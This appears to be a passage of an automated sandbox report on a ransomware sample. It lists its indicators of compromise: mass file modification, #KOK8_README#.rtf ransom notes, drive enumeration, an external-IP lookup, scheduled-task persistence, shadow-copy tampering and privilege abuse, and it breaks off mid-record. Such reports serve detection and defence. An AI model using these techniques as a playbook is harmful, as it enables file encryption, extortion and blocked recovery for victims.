941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\97G4C1D4\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: sOCkujKF64.exe File opened (read-only) \??\G: sOCkujKF64.exe File opened (read-only) \??\R: sOCkujKF64.exe File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\S: sOCkujKF64.exe File opened (read-only) \??\W: sOCkujKF64.exe File opened (read-only) \??\Q: sOCkujKF64.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: sOCkujKF64.exe File opened (read-only) \??\T: sOCkujKF64.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: sOCkujKF64.exe File opened (read-only) \??\Y: sOCkujKF64.exe File opened (read-only) \??\Z: sOCkujKF64.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\A: sOCkujKF64.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: sOCkujKF64.exe File opened (read-only) \??\X: sOCkujKF64.exe File opened (read-only) \??\P: sOCkujKF64.exe File opened (read-only) \??\V: sOCkujKF64.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: sOCkujKF64.exe File opened (read-only) \??\J: sOCkujKF64.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: sOCkujKF64.exe File opened (read-only) \??\N: sOCkujKF64.exe File opened (read-only) \??\U: sOCkujKF64.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: sOCkujKF64.exe File opened (read-only) \??\M: sOCkujKF64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IhklkhQE.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\browser\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Mahjong\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\UnprotectUse.hta 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Minesweeper\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sl.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Purble Place\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\SpiderSolitaire.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\WriteBackup.ps1 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\nb.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3376 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3348 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2460 powershell.exe 2760 sOCkujKF64.exe 2760 sOCkujKF64.exe 2760 sOCkujKF64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 2760 sOCkujKF64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 2760 sOCkujKF64.exe Token: SeLoadDriverPrivilege 2760 sOCkujKF64.exe Token: SeBackupPrivilege 764 vssvc.exe Token: SeRestorePrivilege 764 vssvc.exe Token: SeAuditPrivilege 764 vssvc.exe Token: SeTakeOwnershipPrivilege 1684 takeown.exe Token: SeTakeOwnershipPrivilege 2152 takeown.exe Token: SeTakeOwnershipPrivilege 1588 takeown.exe Token: SeTakeOwnershipPrivilege 3736 takeown.exe Token: SeIncreaseQuotaPrivilege 2292 WMIC.exe Token: SeSecurityPrivilege 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 2292 WMIC.exe Token: SeLoadDriverPrivilege 2292 WMIC.exe Token: SeSystemProfilePrivilege 2292 WMIC.exe Token: SeSystemtimePrivilege 2292 WMIC.exe Token: SeProfSingleProcessPrivilege 2292 WMIC.exe Token: SeIncBasePriorityPrivilege 2292 WMIC.exe Token: SeCreatePagefilePrivilege 2292 WMIC.exe Token: SeBackupPrivilege 2292 WMIC.exe Token: SeRestorePrivilege 2292 WMIC.exe Token: SeShutdownPrivilege 2292 WMIC.exe Token: SeDebugPrivilege 2292 WMIC.exe Token: SeSystemEnvironmentPrivilege 2292 WMIC.exe Token: SeRemoteShutdownPrivilege 2292 WMIC.exe Token: SeUndockPrivilege 2292 WMIC.exe Token: SeManageVolumePrivilege 2292 WMIC.exe Token: 33 2292 WMIC.exe Token: 34 2292 WMIC.exe Token: 35 2292 WMIC.exe Token: SeIncreaseQuotaPrivilege 2292 WMIC.exe Token: SeSecurityPrivilege 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 2292 WMIC.exe Token: SeLoadDriverPrivilege 2292 WMIC.exe Token: SeSystemProfilePrivilege 2292 WMIC.exe Token: SeSystemtimePrivilege 2292 WMIC.exe Token: SeProfSingleProcessPrivilege 2292 WMIC.exe Token: SeIncBasePriorityPrivilege 2292 WMIC.exe Token: SeCreatePagefilePrivilege 2292 WMIC.exe Token: SeBackupPrivilege 2292 WMIC.exe Token: SeRestorePrivilege 2292 WMIC.exe Token: SeShutdownPrivilege 2292 WMIC.exe Token: SeDebugPrivilege 2292 WMIC.exe Token: SeSystemEnvironmentPrivilege 2292 WMIC.exe Token: SeRemoteShutdownPrivilege 2292 WMIC.exe Token: SeUndockPrivilege 2292 WMIC.exe Token: SeManageVolumePrivilege 2292 WMIC.exe Token: 33 2292 WMIC.exe Token: 34 2292 WMIC.exe Token: 35 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 takeown.exe Token: SeTakeOwnershipPrivilege 4464 takeown.exe Token: SeTakeOwnershipPrivilege 4504 takeown.exe Token: SeTakeOwnershipPrivilege 4764 takeown.exe Token: SeTakeOwnershipPrivilege 4860 takeown.exe Token: SeTakeOwnershipPrivilege 2248 takeown.exe Token: SeTakeOwnershipPrivilege 2604 takeown.exe Token: SeTakeOwnershipPrivilege 3908 takeown.exe Token: SeTakeOwnershipPrivilege 4180 takeown.exe Token: SeTakeOwnershipPrivilege 1488 takeown.exe Token: SeTakeOwnershipPrivilege 2464 takeown.exe Token: SeTakeOwnershipPrivilege 108 takeown.exe Token: SeTakeOwnershipPrivilege 1544 takeown.exe Token: SeTakeOwnershipPrivilege 692 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2400 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2148 wrote to memory of 2400 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2148 wrote to memory of 2400 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2148 wrote to memory of 2400 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2148 wrote to memory of 2344 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2148 wrote to memory of 2344 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2148 wrote to memory of 2344 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2148 wrote to memory of 2344 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2148 wrote to memory of 3004 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2148 wrote to memory of 3004 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2148 wrote to memory of 3004 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2148 wrote to memory of 3004 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 3004 wrote to memory of 2460 3004 cmd.exe 35 PID 3004 wrote to memory of 2460 3004 cmd.exe 35 PID 3004 wrote to memory of 2460 3004 cmd.exe 35 PID 3004 wrote to memory of 2460 3004 cmd.exe 35 PID 2148 wrote to memory of 2664 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2148 wrote to memory of 2664 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2148 wrote to memory of 2664 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2148 wrote to memory of 2664 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2148 wrote to memory of 2888 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2148 wrote to memory of 2888 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2148 wrote to memory of 2888 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2148 wrote to memory of 2888 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2888 wrote to memory of 520 2888 cmd.exe 40 PID 2888 wrote to memory of 520 2888 cmd.exe 40 PID 2888 wrote to memory of 520 2888 cmd.exe 40 PID 2888 wrote to memory of 520 2888 cmd.exe 40 PID 2664 wrote to memory of 2292 2664 cmd.exe 41 PID 2664 wrote to memory of 2292 2664 cmd.exe 41 PID 2664 wrote to memory of 2292 2664 cmd.exe 41 PID 2664 wrote to memory of 2292 2664 cmd.exe 41 PID 2664 wrote to memory of 2464 2664 cmd.exe 42 PID 2664 wrote to memory of 2464 2664 cmd.exe 42 PID 2664 wrote to memory of 2464 2664 cmd.exe 42 PID 2664 wrote to memory of 2464 2664 cmd.exe 42 PID 2664 wrote to memory of 2848 2664 cmd.exe 43 PID 2664 wrote to memory of 2848 2664 cmd.exe 43 PID 2664 wrote to memory of 2848 2664 cmd.exe 43 PID 2664 wrote to memory of 2848 2664 cmd.exe 43 PID 2148 wrote to memory of 3048 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 2148 wrote to memory of 3048 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 2148 wrote to memory of 3048 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 2148 wrote to memory of 3048 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 520 wrote to memory of 4012 520 wscript.exe 46 PID 520 wrote to memory of 4012 520 wscript.exe 46 PID 520 wrote to memory of 4012 520 wscript.exe 46 PID 520 wrote to memory of 4012 520 wscript.exe 46 PID 3048 wrote to memory of 1604 3048 cmd.exe 47 PID 3048 wrote to memory of 1604 3048 cmd.exe 47 PID 3048 wrote to memory of 1604 3048 cmd.exe 47 PID 3048 wrote to memory of 1604 3048 cmd.exe 47 PID 4012 wrote to memory of 3376 4012 cmd.exe 49 PID 4012 wrote to memory of 3376 4012 cmd.exe 49 PID 4012 wrote to memory of 3376 4012 cmd.exe 49 PID 4012 wrote to memory of 3376 4012 cmd.exe 49 PID 3048 wrote to memory of 1760 3048 cmd.exe 51 PID 3048 wrote to 